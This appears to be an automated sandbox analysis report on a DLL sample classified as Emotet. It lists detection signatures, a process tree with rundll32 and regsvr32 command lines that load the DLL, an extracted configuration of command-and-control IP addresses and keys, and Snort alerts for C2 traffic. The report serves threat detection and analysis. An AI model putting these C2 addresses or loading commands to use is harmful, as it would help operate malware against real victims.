Play interactive tour

Edit tour

Windows Analysis Report ALNgwfVtrB

Overview

General Information

Sample Name:	ALNgwfVtrB (renamed file extension from none to dll)
Analysis ID:	553377
MD5:	61308ba77d051e4e76e532f9709635e0
SHA1:	95d2cd6c7be346d29735ed970d3f373d37b7e13f
SHA256:	bd2c1b86de45c3e9d0d7c85322228c3512ce2c041765d95bb613cdf12647bea9
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Suspicious Call by Ordinal

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6764 cmdline: loaddll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 4616 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6048 cmdline: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4668 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey",QTEnBIyMIuE MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4584 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mhgwckn\ikgetkts.aey",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 3408 cmdline: regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 400 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6800 cmdline: rundll32.exe C:\Users\user\Desktop\ALNgwfVtrB.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 5264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4588 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 4680 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 5688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5796 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.388319825.0000000005640000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388061342.00000000053B1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388938400.0000000005A60000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425302680.00000000054F1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388421865.00000000056A0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.421593787.0000000004051000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388494502.00000000056D1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388374896.0000000005671000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.424744123.00000000033B0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.390300102.0000000004A11000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388137915.0000000005460000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425412117.0000000005600000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388743358.0000000005900000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425380885.00000000055D1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.421559907.0000000004020000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.378920575.0000000000B50000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.387667842.0000000004E61000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.380234706.0000000000B50000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.389941280.0000000003080000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.377076576.00000000046D1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.380280063.0000000000D31000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425231298.00000000053C1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.403315549.0000000000B50000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.387995858.0000000005380000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.379032722.0000000000D31000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.389038479.0000000005A91000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425055302.0000000005200000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.376980438.00000000046A0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425273355.00000000054C0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425444879.0000000005631000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388835673.0000000005931000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.387132452.00000000033D0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.388209292.0000000005491000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.425344500.00000000055A0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.rundll32.exe.5200000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5a90000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.54c0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.46a0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.53b0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.b50000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5490000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b50000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b50000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.56a0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5640000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.46a0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b50000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.d30000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.56d0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.55d0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5460000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5600000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.53c0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5200000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.b50000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.46d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3080000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5930000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5640000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5630000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.4020000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5900000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.55a0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.55a0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5380000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5380000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.d30000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.33d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.56a0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.4e60000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5600000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.33b0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5670000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.4020000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.54c0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3080000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3660000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.33d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.54f0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.4a10000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5900000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5a60000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.33b0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5a60000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.b50000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.4050000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.d30000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5460000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 49 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4616, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1, ProcessId: 6048

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.loaddll32.exe.b50000.0.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Multi AV Scanner detection for submitted file

Show sources

Source: ALNgwfVtrB.dll

Virustotal: Detection: 15%

Perma Link

Source: ALNgwfVtrB.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.386248432.0000000001084000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386451052.00000000008F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386643870.00000000008F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.387103473.0000000001089000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390639136.0000000001125000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.387043294.00000000008EB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386443931.00000000008EB000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390639136.0000000001125000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbQk source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb6g source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdbok.zD source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb!kXz source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb?k~z source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.386458009.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386707582.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386650391.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386804457.00000000008F7000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.386458009.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386707582.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386650391.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386804457.00000000008F7000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb9kpz source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb]k source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.386451052.00000000008F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386643870.00000000008F1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdbuk4zl source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: a/pjr2pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000009.00000002.401712125.0000000000672000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.387043294.00000000008EB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386443931.00000000008EB000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.6:49727 -> 45.138.98.34:80
Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.6:49728 -> 69.16.218.101:8080

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 45.138.98.34:80
Source: Malware configuration extractor	IPs: 69.16.218.101:8080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443

Source: global traffic

TCP traffic: 192.168.2.6:49728 -> 69.16.218.101:8080

Source: unknown

Network traffic detected: IP country count 12

Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
